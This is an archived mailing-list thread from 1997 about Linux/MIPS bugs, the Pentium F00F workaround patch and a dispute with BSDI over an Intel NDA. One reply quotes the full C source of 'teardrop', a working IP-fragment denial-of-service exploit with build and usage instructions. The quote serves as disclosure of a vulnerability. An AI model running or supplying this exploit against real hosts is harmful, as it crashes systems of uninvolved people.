All the mail mirrored from lore.kernel.org
* bug in IRIX tftpd?
@ 1996-08-14 22:58 64% David S. Miller
  0 siblings, 0 replies; 200+ results
From: David S. Miller @ 1996-08-14 22:58 UTC (permalink / raw)
  To: linux


Wonder if someone can help me fix this problem:

Seems that the IRIX tftpd daemon will not respond correctly to
requests in binary mode. I can reproduce the problem at will and it
happens every time.

I can do the transfer just fine using ascii mode, but any attempt to
use binary mode fails.  What is funny is that TFTPD places a syslog
entry that says:

Aug 14 15:57:13 6D:tanya tftpd[1373]: sandra.engr.sgi.com: read request for /tftpboot/96A64B0F.SUN4C: success

Yet tftpd does not send one packet back.  It does not matter what
machine I try to do this tftp transfer from.  ASCII mode always works,
binary mode always fails.

dm@engr.sgi.com

'Ooohh.. "FreeBSD is faster over loopback, when compared to
Linux over the wire". Film at 11.' -Linus

^ permalink raw reply	[relevance 64%]

* ignore tftp bug report
@ 1996-08-14 23:46 64% David S. Miller
  0 siblings, 0 replies; 200+ results
From: David S. Miller @ 1996-08-14 23:46 UTC (permalink / raw)
  To: linux


Duh, no one was answering tanya's ARP requests for sandra.engr

dm@engr.sgi.com

'Ooohh.. "FreeBSD is faster over loopback, when compared to
Linux over the wire". Film at 11.' -Linus

^ permalink raw reply	[relevance 64%]

* GCC bug
@ 1997-07-05 21:09 64% Ralf Baechle
  0 siblings, 0 replies; 200+ results
From: Ralf Baechle @ 1997-07-05 21:09 UTC (permalink / raw)


Hi,

the most current GCC package installs the header file assert.h although
it shouldn't.  The problem is that the GCC version of assert.h will
not include <gnu/stubs.h> but autoconf generated configure scripts
rely on that.  If you ever wondered why loading programs caused warnings
like 'the function lchown is not implemented and will always fail', this
is caused by the wrong assert.h.

Quick fix: rm <prefix>/<target>/include/assert.h, for example
rm /usr/local/mipsel-linux/include/assert.h.  Note that this applies
to both native and crosscompilers.  None of them will install the
assert.h file in /usr/include/.

  Ralf

^ permalink raw reply	[relevance 64%]

* Bottom half bug
@ 1997-08-10  2:06 64% Ralf Baechle
  1997-08-11 23:59 64% ` Miguel de Icaza
  0 siblings, 1 reply; 200+ results
From: Ralf Baechle @ 1997-08-10  2:06 UTC (permalink / raw)
  To: linux

Hi,

it seems that Miguel's recently reported problem, as well as the feature
that <CTRL>-S locks the machine, sometimes for some seconds and sometimes
for good, is hidden somewhere in the bottom half handlers.

  Ralf

^ permalink raw reply	[relevance 64%]

* Re: Bottom half bug
  1997-08-10  2:06 64% Bottom half bug Ralf Baechle
@ 1997-08-11 23:59 64% ` Miguel de Icaza
  1997-08-12  4:07 64%       ` Ralf Baechle
  0 siblings, 1 reply; 200+ results
From: Miguel de Icaza @ 1997-08-11 23:59 UTC (permalink / raw)
  To: ralf; +Cc: linux


Hello Ralf, list,

  Well, the major problem with getting gdb up was that init is for
some reason setting the blocked signal mask to 0x39 (this includes
sighup, sigtrap and a couple of others).  

  I will debug this next, right now I have this gross hack on gdb to
reset the signal mask to zero.  Any ideas of why would init be doing this?

Cheers,
Miguel.

^ permalink raw reply	[relevance 64%]

* Re: Bottom half bug
  1997-08-11 23:59 64% ` Miguel de Icaza
@ 1997-08-12  4:07 64%       ` Ralf Baechle
  0 siblings, 0 replies; 200+ results
From: Ralf Baechle @ 1997-08-12  4:07 UTC (permalink / raw)
  To: Miguel de Icaza; +Cc: ralf, linux

>   Well, the major problem with getting gdb up was that init is for
> some reason setting the blocked signal mask to 0x39 (this includes
> sighup, sigtrap and a couple of others).  
> 
>   I will debug this next, right now I have this gross hack on gdb to
> reset the signal mask to zero.  Any ideas of why would init be doing this?

Well, I'll look at this when I get off the plane or so ...

I finally tracked the problem with <CTRL>-s locking up the machine down.
It's a missing restore_flags() in the newport driver that makes the
keyboard driver bottom half go bobo.  Also we were missing irq_enter/
irq_leave in the Indy interrupt handler.  The patch, well, it's in my
suit case.  Have fun with your crashing boxes :-)

California, I'm comin',

  Ralf

^ permalink raw reply	[relevance 64%]

* Re: Bottom half bug
  1997-08-12  4:07 64%       ` Ralf Baechle
@ 1997-08-12 16:26 64%           ` Miguel de Icaza
  -1 siblings, 0 replies; 200+ results
From: Miguel de Icaza @ 1997-08-12 16:26 UTC (permalink / raw)
  To: ralf; +Cc: linux


> I finally tracked the problem with <CTRL>-s locking up the machine down.
> It's a missing restore_flags() in the newport driver that makes the
> keyboard driver bottom half go bobo.  Also we were missing irq_enter/
> irq_leave in the Indy interrupt handler.  The patch, well, it's in my
> suit case.  Have fun with your crashing boxes :-)

Thanks for the pointers.  They are fixed in my tree now :-).

Cheers,
Miguel.

^ permalink raw reply	[relevance 64%]

* glibc 2.0.4 bug ...
@ 1997-09-24  7:15 64% Ralf Baechle
  1997-09-24 17:16 64% ` Ulrich Drepper
  0 siblings, 1 reply; 200+ results
From: Ralf Baechle @ 1997-09-24  7:15 UTC (permalink / raw)
  To: linux-mips, linux, drepper

Hi all,

glibc 2.0.4 contains a fatal bug.  It does not declare a prototype for
the function llseek in unistd.h.  As a result GCC will (correctly) truncate
the 64 bit file offset and build erroneous filesystems when building
filesystems of 2GB.  e2fsck will complain about read errors when trying
to read blocks from the 2GB border on.  Actually I wonder why I never saw
a report about that on other mailing lists.

Quickfix: add the following prototype for llseek(2):

  extern loff_t llseek (int fd, loff_t offset, int whence);

  Ralf

^ permalink raw reply	[relevance 64%]

* Re: glibc 2.0.4 bug ...
  1997-09-24  7:15 64% glibc 2.0.4 bug Ralf Baechle
@ 1997-09-24 17:16 64% ` Ulrich Drepper
  0 siblings, 0 replies; 200+ results
From: Ulrich Drepper @ 1997-09-24 17:16 UTC (permalink / raw)
  To: ralf; +Cc: linux-mips, linux

From: Ralf Baechle <ralf@cobaltmicro.com>
Subject: glibc 2.0.4 bug ...
Date: Wed, 24 Sep 1997 00:15:10 -0700 (PDT)

> Quickfix: add the following prototype for llseek(2):
> 
>   extern loff_t llseek (int fd, loff_t offset, int whence);

I've mentioned this several times: llseek is an internal function.
What we need is the LFS interface which then defines lseek64.

-- Uli
---------------.      drepper@cygnus.com  ,-.   Rubensstrasse 5
Ulrich Drepper  \    ,-------------------'   \  76149 Karlsruhe/Germany
Cygnus Solutions `--' drepper@gnu.ai.mit.edu  `------------------------

^ permalink raw reply	[relevance 64%]

* static rpm bug, dynamic linker
@ 1997-10-14 23:58 64% Ralf Baechle
  0 siblings, 0 replies; 200+ results
From: Ralf Baechle @ 1997-10-14 23:58 UTC (permalink / raw)
  To: linux, linux-mips

Hi all,

I spent a lot of time on fixing the dynamic linker.  The bugs Miguel
found by building native X libraries are fixed by now.  The only one
that is still giving me a puzzle to solve is the fact that
certain statically linked executables, most prominently rpm, are
failing.

I'm about to fix that one as well, and until then want to remind people that
static linking is a dead concept anyway.  rpm for example will load a
dynamic libc when using the nss services, so all you get is bloat while
the knowledge about the kernel interfaces embedded into the statically
linked libc makes it very difficult to improve system interfaces.

  Ralf

^ permalink raw reply	[relevance 64%]

* Pentium F00F bug Linux workaround
@ 1997-11-14 21:17 55%   ` Ariel Faigon
  0 siblings, 0 replies; 200+ results
From: Ariel Faigon @ 1997-11-14 21:17 UTC (permalink / raw)
  To: SGI/Linux mailing list

[Just forwarding from linux-dev since I thought some people
 may be interested.  Ingo Molnar has found a way to workaround
 the latest Pentium/Pentium-MMX F00F bug. Linus then improved on it.

 I'm impressed by the repeatedly demonstrated ability of the Linux
 community to beat Microsoft.  It remains to be seen how long it'll
 take Microsoft to respond to this serious bug that can crash any
 Windows/WindowsNT machine from user mode (incl. any remotely loaded
 Captive-X control)]

-------------------------------------------------------------------------

From Linus:

Ingo, Alan, others,
 I have a quick cleanup of 2.1.63 that looks a bit better wrt the F0 0F
bug, and also avoids the double SMP unlock that somebody noticed (sorry
for not giving attribution, I've been pretty rushed today trying to get
the stuff out quickly to people to test). 

I still don't have any pentium closeby to actually test this, so I'm
appending patches relative to 2.1.63. Does this still work for people with
the bug?

		Linus

-----
diff -u --recursive --new-file v2.1.63/linux/arch/i386/mm/fault.c linux/arch/i386/mm/fault.c
--- v2.1.63/linux/arch/i386/mm/fault.c	Wed Nov 12 13:34:25 1997
+++ linux/arch/i386/mm/fault.c	Wed Nov 12 13:33:48 1997
@@ -74,14 +74,6 @@
 	return 0;
 }
 
-asmlinkage void divide_error(void);
-asmlinkage void debug(void);
-asmlinkage void nmi(void);
-asmlinkage void int3(void);
-asmlinkage void overflow(void);
-asmlinkage void bounds(void);
-asmlinkage void invalid_op(void);
-
 asmlinkage void do_divide_error (struct pt_regs *, unsigned long);
 asmlinkage void do_debug (struct pt_regs *, unsigned long);
 asmlinkage void do_nmi (struct pt_regs *, unsigned long);
@@ -189,44 +181,27 @@
 		goto out;
 	}
 
-	printk("<%p/%p>\n", idt2, (void *)address);
 	/*
 	 * Pentium F0 0F C7 C8 bug workaround:
 	 */
-	if ( pentium_f00f_bug && (address >= (unsigned long)idt2) &&
-			(address < (unsigned long)idt2+256*8) ) {
-
-		void (*handler) (void);
-		int nr = (address-(unsigned long)idt2)/8;
-		unsigned long low, high;
-
-		low = idt[nr].a;
-		high = idt[nr].b;
-
-		handler = (void (*) (void)) ((low&0x0000ffff) | (high&0xffff0000));
-		printk("<handler %p... ", handler);
-		unlock_kernel();
-
-		if (handler==divide_error)
-			do_divide_error(regs,error_code);
-		else if (handler==debug)
-			do_debug(regs,error_code);
-		else if (handler==nmi)
-			do_nmi(regs,error_code);
-		else if (handler==int3)
-			do_int3(regs,error_code);
-		else if (handler==overflow)
-			do_overflow(regs,error_code);
-		else if (handler==bounds)
-			do_bounds(regs,error_code);
-		else if (handler==invalid_op)
-			do_invalid_op(regs,error_code);
-		else {
-			printk("INVALID HANDLER!\n");
-			for (;;) __cli();
+	if ( pentium_f00f_bug ) {
+		unsigned long nr;
+		
+		nr = (address - (unsigned long) idt2) >> 3;
+
+		if (nr < 7) {
+			static void (*handler[])(struct pt_regs *, unsigned long) = {
+				do_divide_error,	/* 0 - divide overflow */
+				do_debug,		/* 1 - debug trap */
+				do_nmi,			/* 2 - NMI */
+				do_int3,		/* 3 - int 3 */
+				do_overflow,		/* 4 - overflow */
+				do_bounds,		/* 5 - bound range */
+				do_invalid_op };	/* 6 - invalid opcode */
+			unlock_kernel();
+			handler[nr](regs, error_code);
+			return;
 		}
-		printk("... done>\n");
-		goto out;
 	}
 
 	/* Are we prepared to handle this kernel fault?  */


-- 
Peace, Ariel

^ permalink raw reply	[relevance 55%]

* Re: Pentium F00F bug Linux workaround
  1997-11-14 21:17 55%   ` Ariel Faigon
  (?)
@ 1997-11-14 21:49 64%   ` David S. Miller
  -1 siblings, 0 replies; 200+ results
From: David S. Miller @ 1997-11-14 21:49 UTC (permalink / raw)
  To: ariel; +Cc: linux


We also got some good press from it pretty fast after we released the
fixes:

http://www.news.com/News/Item/0,4,16312,00.html

What's extremely humorous is that BSDI signed an NDA with Intel to get
early fix techniques told to them by Intel engineers.  But the NDA
stated they could not release patch sets for BSDI until Intel said so,
the thinking on Intel's part is that they wanted nobody to be the
first with a fix.  BSDI overlooked this and put the fix out, then
quickly took the fixes down once they realized they had breached the
Intel NDA.

After the Linux fix was already out, Intel engineers spoke with Linus
and tried to get him to sign an NDA, I've never laughed so hard in my
life.

Later,
David S. Miller
davem@dm.cobaltmicro.com

^ permalink raw reply	[relevance 64%]

* Re: Pentium F00F bug Linux workaround
  1997-11-14 21:17 55%   ` Ariel Faigon
  (?)
  (?)
@ 1997-11-14 22:01 64%   ` ralf
  -1 siblings, 0 replies; 200+ results
From: ralf @ 1997-11-14 22:01 UTC (permalink / raw)
  To: Ariel Faigon; +Cc: SGI/Linux mailing list

On Fri, Nov 14, 1997 at 01:17:24PM -0800, Ariel Faigon wrote:
> [Just forwarding from linux-dev since I thought some people
>  may be interested.  Ingo Molnar has found a way to workaround
>  the latest Pentium/Pentium-MMX F00F bug. Linus then improved on it.
> 
>  I'm impressed by the repeatedly demonstrated ability of the Linux
>  community to beat Microsoft.  It remains to be seen how long it'll
>  take Microsoft to respond to this serious bug that can crash any
>  Windows/WindowsNT machine from user mode (incl. any remotely loaded
>  Captive-X control)]

The Linux kernel as well handles a CPU bug that QED / IDT still haven't
acknowledged to exist :-)

  Ralf

^ permalink raw reply	[relevance 64%]

* Re: Pentium F00F bug Linux workaround
  1997-11-14 21:17 55%   ` Ariel Faigon
                     ` (2 preceding siblings ...)
  (?)
@ 1997-11-14 22:25 45%   ` Alan Cox
  -1 siblings, 0 replies; 200+ results
From: Alan Cox @ 1997-11-14 22:25 UTC (permalink / raw)
  To: ariel; +Cc: linux

>  I'm impressed by the repeatedly demonstrated ability of the Linux
>  community to beat Microsoft.  It remains to be seen how long it'll
>  take Microsoft to respond to this serious bug that can crash any
>  Windows/WindowsNT machine from user mode (incl. any remotely loaded
>  Captive-X control)]

For various complex political/vendor reasons between intel and OS vendors
the situation on this is somewhat misleading on speed of fixing. Don't take
this specific one as a fair measurement. 

Let's see how long they take to fix the one below..  (Linux fix in 2.1.64pre
and on various sites). Irix isn't vulnerable btw ;)

Alan

/*
 *  Copyright (c) 1997 route|daemon9  <route@infonexus.com> 11.3.97
 *
 *  Linux/NT/95 Overlap frag bug exploit
 *
 *  Exploits the overlapping IP fragment bug present in all Linux kernels and
 *  NT 4.0 / Windows 95 (others?)
 *
 *  Based off of:   flip.c by klepto
 *  Compiles on:    Linux, *BSD*
 *
 *  gcc -O2 teardrop.c -o teardrop
 *      OR
 *  gcc -O2 teardrop.c -o teardrop -DSTRANGE_BSD_BYTE_ORDERING_THING
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>

#ifdef STRANGE_BSD_BYTE_ORDERING_THING
                        /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n)  (n)
#else                   /* OpenBSD 2.1, all Linux */
#define FIX(n)  htons(n)
#endif  /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF   0x2000  /* More IP fragment en route */
#define IPH     0x14    /* IP header size */
#define UDPH    0x8     /* UDP header size */
#define PADDING 0x1c    /* datagram frame padding for first packet */
#define MAGIC   0x3     /* Magic Fragment Constant (tm).  Should be 2 or 3 */
#define COUNT   0x1     /* Linux dies with 1, NT is more stalwart and can
                         * withstand maybe 5 or 10 sometimes...  Experiment.
                         */
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);

int main(int argc, char **argv)
{
    int one = 1, count = 0, i, rip_sock;
    u_long  src_ip = 0, dst_ip = 0;
    u_short src_prt = 0, dst_prt = 0;
    struct in_addr addr;

    fprintf(stderr, "teardrop   route|daemon9\n\n");

    if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
        perror("raw socket");
        exit(1);
    }
    if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
        < 0)
    {
        perror("IP_HDRINCL");
        exit(1);
    }
    if (argc < 3) usage(argv[0]);
    if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
    {
        fprintf(stderr, "What the hell kind of IP address is that?\n");
        exit(1);
    }

    while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
    {
        switch (i)
        {
            case 's':               /* source port (should be emphemeral) */
                src_prt = (u_short)atoi(optarg);
                break;
            case 't':               /* dest port (DNS, anyone?) */
                dst_prt = (u_short)atoi(optarg);
                break;
            case 'n':               /* number to send */
                count   = atoi(optarg);
                break;
            default :
                usage(argv[0]);
                break;              /* NOTREACHED */
        }
    }
    srandom((unsigned)(time((time_t)0)));
    if (!src_prt) src_prt = (random() % 0xffff);
    if (!dst_prt) dst_prt = (random() % 0xffff);
    if (!count)   count   = COUNT;

    fprintf(stderr, "Death on flaxen wings:\n");
    addr.s_addr = src_ip;
    fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
    addr.s_addr = dst_ip;
    fprintf(stderr, "  To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
    fprintf(stderr, " Amt: %5d\n", count);
    fprintf(stderr, "[ ");

    for (i = 0; i < count; i++)
    {
        send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
        fprintf(stderr, "b00m ");
        usleep(500);
    }
    fprintf(stderr, "]\n");
    return (0);
}

/*
 *  Send two IP fragments with pathological offsets.  We use an implementation
 *  independent way of assembling network packets that does not rely on any of
 *  the diverse O/S specific nomenclature hinderances (well, linux vs. BSD).
 */

void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
                u_short dst_prt)
{
    u_char *packet = NULL, *p_ptr = NULL;   /* packet pointers */
    u_char byte;                            /* a byte */
    struct sockaddr_in sin;                 /* socket protocol structure */

    sin.sin_family      = AF_INET;
    sin.sin_port        = src_prt;
    sin.sin_addr.s_addr = dst_ip;

    /*
     * Grab some memory for our packet, align p_ptr to point at the beginning
     * of our packet, and then fill it with zeros.
     */
    packet = (u_char *)malloc(IPH + UDPH + PADDING);
    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

    byte = 0x45;                        /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING);    /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) |= FIX(IP_MF);  /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + PADDING);   /* UDP total length */

    if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    /*  We set the fragment offset to be inside of the previous packet's
     *  payload (it overlaps inside the previous packet) but do not include
     *  enough payload to cover complete the datagram.  Just the header will
     *  do, but to crash NT/95 machines, a bit larger of packet seems to work
     *  better.
     */
    p_ptr = &packet[2];         /* IP total length is 2 bytes into the header */
    *((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
    p_ptr += 4;                 /* IP offset is 6 bytes into the header */
    *((u_short *)p_ptr) = FIX(MAGIC);

    if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }
    free(packet);
}

u_long name_resolve(u_char *host_name)
{
    struct in_addr addr;
    struct hostent *host_ent;

    if ((addr.s_addr = inet_addr(host_name)) == -1)
    {
        if (!(host_ent = gethostbyname(host_name))) return (0);
        bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
    }
    return (addr.s_addr);
}

void usage(u_char *name)
{
    fprintf(stderr,
            "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",
            name);
    exit(0);
}

/* EOF */

^ permalink raw reply	[relevance 45%]

* Re: Pentium F00F bug Linux workaround; BSDI Response
@ 1997-11-17 21:28 51%   ` William Fisher
  0 siblings, 0 replies; 200+ results
From: William Fisher @ 1997-11-17 21:28 UTC (permalink / raw)
  To: linux; +Cc: William Fisher

Here is the response I got from BSDI on the Pentium F00F bug fix.

-- Bill
-----------------------
From dab@frantic.BSDI.COM  Sat Nov 15 09:32:26 1997
Date: Sat, 15 Nov 1997 11:32:42 -0600 (CST)
From: David Borman <dab@BSDI.COM>
Message-Id: <199711151732.LAA17129@frantic.BSDI.COM>
To: fisher@sgi.com
Subject: Re: Pentium F00F bug Linux workaround

Hi Bill,

> Is this true that:
> 
> "BSDI signed an NDA with Intel to get early fix techniques"?
> 
> ...
> Subject: Re: Pentium F00F bug Linux workaround
> References:  <199711142117.NAA27890@.....>
> Sender: owner-linux@cthulhu
> Precedence: bulk
> 
> We also got some good press from it pretty fast after we released the fixes:
> 
> http://www.news.com/News/Item/0,4,16312,00.html
> 
> What's extremely humorous is that BSDI signed an NDA with Intel to get
> early fix techniques told to them by Intel engineers.  But the NDA
> stated they could not release patch sets for BSDI until Intel said so,
> the thinking on Intel's part is that they wanted nobody to be the
> first with a fix.  BSDI overlooked this and put the fix out, then
> quickly took the fixes down once they realized they had breached the
> Intel NDA.
> 
> After the Linux fix was already out, Intel engineers spoke with Linus
> and tried to get him to sign an NDA, I've never laughed so hard in my life.
>
Hmm... The Linux message is not accurate.  At no time has BSDI violated
any agreements with Intel.  The first patch that we put up was a beta
patch.  It solves the problem, but we made some minor improvements on
it in our official patch.

I'll also point out that Intel called us.  From our official patch:

	BSDI has worked closely with Intel since they contacted us about
	this erratum. We were able to develop a workaround for BSD/OS very
	quickly, and Intel's assistance was invaluable in this process.
	BSDI is confident that the software workaround solves this problem
	for our customers.
	...
	Thanks to Intel Corporation for contacting BSDI with data that
	led to the fix.

Also, though I don't personally have anything to support this, it is our
understanding that the Linux fix was based at least in part upon
disassembling our beta patch.

I've attached our "press release".

		-David Borman, dab@bsdi.com


FOR IMMEDIATE RELEASE
Contact:	Donna Faulkner
		Baron, McDonald & Wells
		770/492-0373
		dfaulkner@bmwpr.com

First Intel Pentium Processor 'F0' Bug Fix Announced for BSDI ISP Customers

ISPs and other users of BSD/OS can be protected against system 'freezes'
caused by illegal code strings 

COLORADO SPRINGS, Co.  (November 17, 1997)

Internet Service Providers (ISPs) and other users of the BSD/OS can now protect themselves against problems associated with the 'F0' bug discovered in Intel's Pentium processor.  Berkeley Software Design, Inc. (BSDI) today announced a patch that protects companies running BSD/OS 3.1, 3.0, 2.1 against system freezes caused when the processor receives an illegal, one-line instruction.  
	BSDI's patch enables the BSD/OS to gain control whenever an invalid sequence is executed, enabling the system to take its normal action in response to illegal instructions.  The patch offers a solution to more than 7,000 organizations and companies relying on the BSD/OS, including over 3,000 ISPs worldwide.  ISPs are particularly vulnerable to system attacks based on the Pentium processor bug, since any user or subscriber with malicious intent has the potential to create a system-wide hang-up.

	"BSDI has developed an outstanding reputation for rapid response to attacks," said Mike Karels, vice president of engineering for BSDI.  "Last summer, we were the first commercial vendor to provide a defense against 'SYN-flooding' attacks.  This week, we have once again demonstrated industry-leading support for our customers."

The BSD/OS patch is downloadable from the company's web site at
	http://www.bsdi.com. 
Berkeley Software Design, Inc. is the commercial supplier of the
high-performance BSD Internet and networking system software originally
developed at the University of California, Berkeley.

Internet experts worldwide are powering the networked economy with over 75,000 deployed servers running BSDI software engines and applications.  BSDI products for Intel-based PC platforms include the BSDI Internet Server, BSD/OS, and network software for networking appliance developers.  BSDI customers include Adobe Systems, Chase Manhattan Bank, CompuServe, U.S. West, UUNET Technologies, Volvo, and leading Internet Service Providers worldwide.  BSDI is privately held and headquartered in Colorado Springs, Colorado.  Contact BSDI at 719-593-9445, info@bsdi.com or http://www.bsdi.com.

BSDI, BSD/OS and the BSDI logo are trademarks of Berkeley Software Design, Inc.  All other product or service names are trademarks of their respective owners.

^ permalink raw reply	[relevance 50%]

* Re: Pentium F00F bug Linux workaround; BSDI Response
@ 1997-11-17 21:28 51%   ` William Fisher
  0 siblings, 0 replies; 200+ results
From: William Fisher @ 1997-11-17 21:28 UTC (permalink / raw)
  To: linux; +Cc: William Fisher

Here is the response I got from BSDI on the Pentium F00F bug fix.

-- Bill
-----------------------
>From dab@frantic.BSDI.COM  Sat Nov 15 09:32:26 1997
Date: Sat, 15 Nov 1997 11:32:42 -0600 (CST)
From: David Borman <dab@BSDI.COM>
Message-Id: <199711151732.LAA17129@frantic.BSDI.COM>
To: fisher@sgi.com
Subject: Re: Pentium F00F bug Linux workaround

Hi Bill,

> Is this true that:
> 
> "BSDI signed an NDA with Intel to get early fix techniques"?
> 
> ...
> Subject: Re: Pentium F00F bug Linux workaround
> References:  <199711142117.NAA27890@.....>
> Sender: owner-linux@cthulhu
> Precedence: bulk
> 
> We also got some good press from it pretty fast after we released the fixes:
> 
> http://www.news.com/News/Item/0,4,16312,00.html
> 
> What's extremely humorous is that BSDI signed an NDA with Intel to get
> early fix techniques told to them by Intel engineers.  But the NDA
> stated they could not release patch sets for BSDI until Intel said so,
> the thinking on Intel's part is that they wanted nobody to be the
> first with a fix.  BSDI overlooked this and put the fix out, then
> quickly took the fixes down once they realized they had breached the
> Intel NDA.
> 
> After the Linux fix was already out, Intel engineers spoke with Linus
> and tried to get him to sign an NDA, I've never laughed so hard in my life.
>
Hmm... The Linux message is not accurate.  At no time has BSDI violated
any agreements with Intel.  The first patch that we put up was a beta
patch.  It solves the problem, but we made some minor improvements on
it in our official patch.

I'll also point out that Intel called us.  From our official patch:

	BSDI has worked closely with Intel since they contacted us about
	this erratum. We were able to develop a workaround for BSD/OS very
	quickly, and Intel's assistance was invaluable in this process.
	BSDI is confident that the software workaround solves this problem
	for our customers.
	...
	Thanks to Intel Corporation for contacting BSDI with data that
	led to the fix.

Also, though I don't personally have anything to support this, it is our
understanding that the Linux fix was based at least in part upon
disassembling our beta patch.

I've attached our "press release".

		-David Borman, dab@bsdi.com


FOR IMMEDIATE RELEASE
Contact:	Donna Faulkner
		Baron, McDonald & Wells
		770/492-0373
		dfaulkner@bmwpr.com

First Intel Pentium Processor 'F0' Bug Fix Announced for BSDI ISP Customers

ISPs and other users of BSD/OS can be protected against system 'freezes'
caused by illegal code strings 

COLORADO SPRINGS, Co.  (November 17, 1997)

Internet Service Providers (ISPs) and other users of the BSD/OS can now protect themselves against problems associated with the 'F0' bug discovered in Intel's Pentium processor.  Berkeley Software Design, Inc. (BSDI) today announced a patch that protects companies running BSD/OS 3.1, 3.0, 2.1 against system freezes caused when the processor receives an illegal, one-line instruction.  
	BSDI's patch enables the BSD/OS to gain control whenever an invalid sequence is executed, enabling the system to take its normal action in response to illegal instructions.  The patch offers a solution to more than 7,000 organizations and companies relying on the BSD/OS, including over 3,000 ISPs worldwide.  ISPs are particularly vulnerable to system attacks based on the Pentium processor bug, since any user or subscriber with malicious intent has the potential to create a system-wide hang-up.

	"BSDI has developed an outstanding reputation for rapid response to attacks," said Mike Karels, vice president of engineering for BSDI.  "Last summer, we were the first commercial vendor to provide a defense against 'SYN-flooding' attacks.  This week, we have once again demonstrated industry-leading support for our customers."

The BSD/OS patch is downloadable from the company's web site at
	http://www.bsdi.com. 
Berkeley Software Design, Inc. is the commercial supplier of the
high-performance BSD Internet and networking system software originally
developed at the University of California, Berkeley.

Internet experts worldwide are powering the networked economy with over 75,000 deployed servers running BSDI software engines and applications.  BSDI products for Intel-based PC platforms include the BSDI Internet Server, BSD/OS, and network software for networking appliance developers.  BSDI customers include Adobe Systems, Chase Manhattan Bank, CompuServe, U.S. West, UUNET Technologies, Volvo, and leading Internet Service Providers worldwide.  BSDI is privately held and headquartered in Colorado Springs, Colorado.  Contact BSDI at 719-593-9445, info@bsdi.com or http://www.bsdi.com.

BSDI, BSD/OS and the BSDI logo are trademarks of Berkeley Software Design, Inc.  All other product or service names are trademarks of their respective owners.

^ permalink raw reply	[relevance 51%]

* Re: Pentium F00F bug Linux workaround; BSDI Response
  1997-11-17 21:28 51%   ` William Fisher
  (?)
@ 1997-11-17 23:23 64%   ` David S. Miller
  1997-11-17 23:56 64%       ` Alan Cox
  -1 siblings, 1 reply; 200+ results
From: David S. Miller @ 1997-11-17 23:23 UTC (permalink / raw)
  To: fisher; +Cc: linux, fisher


I'm going to choose more carefully what I decide to post here if it's
going to make its way to every Tom, Dick, and Harry out there in the
unix industry...

Fact is that Intel was trying to make sure _no_ vendor had a fix out
before anyone else.  If it was not explicitly stated in the NDA they
signed with Intel, this was a mistake and not what was intended.

Now that you've talked to Borman about this fish, ask him why he had
to take the patch set down within a day or so.  If he says "because it
was a BETA patch set", I'd find his response hard to believe.

Intel engineers internally were working themselves on fixes for
various systems that they did have source to (Linux, maybe
{net,free}BSD and a few others) and planned to release those patch
sets and allow vendors to release their own patches at the same exact
time.

BSDI putting out their patch ahead of that point in time was, if
anything, totally against how Intel wanted things to happen.

Later,
David S. Miller
davem@dm.cobaltmicro.com

^ permalink raw reply	[relevance 64%]

* Re: Pentium F00F bug Linux workaround; BSDI Response
@ 1997-11-17 23:56 64%       ` Alan Cox
  0 siblings, 0 replies; 200+ results
From: Alan Cox @ 1997-11-17 23:56 UTC (permalink / raw)
  To: David S. Miller; +Cc: fisher, linux, fisher

> BSDI putting out their patch ahead of that point in time was, if
> anything, totally against how Intel wanted things to happen.

Dave, take this off list. And if you are going to say things like
"XYZ violated their NDA" expect them to both hear about it and reply. Fair's
fair.

^ permalink raw reply	[relevance 64%]

* Re: Bug - Re: memleak 'DeLuxe' detector, 2.0.32, patch
       [not found]     <19971205123800.34650@odo.amherst.com>
@ 1997-12-06  6:16 64% ` MOLNAR Ingo
  0 siblings, 0 replies; 200+ results
From: MOLNAR Ingo @ 1997-12-06  6:16 UTC (permalink / raw)
  To: Randy Dees; +Cc: Linux Kernel List


On Fri, 5 Dec 1997, Randy Dees wrote:

> Thanks - but it won't compile for me.  

ok, the problem is that kfree() is now a macro, and the NCR driver tries
to take its address ... 

this little patch should help:

--- 53c7,8xx.c.orig	Sat Dec  6 08:14:24 1997
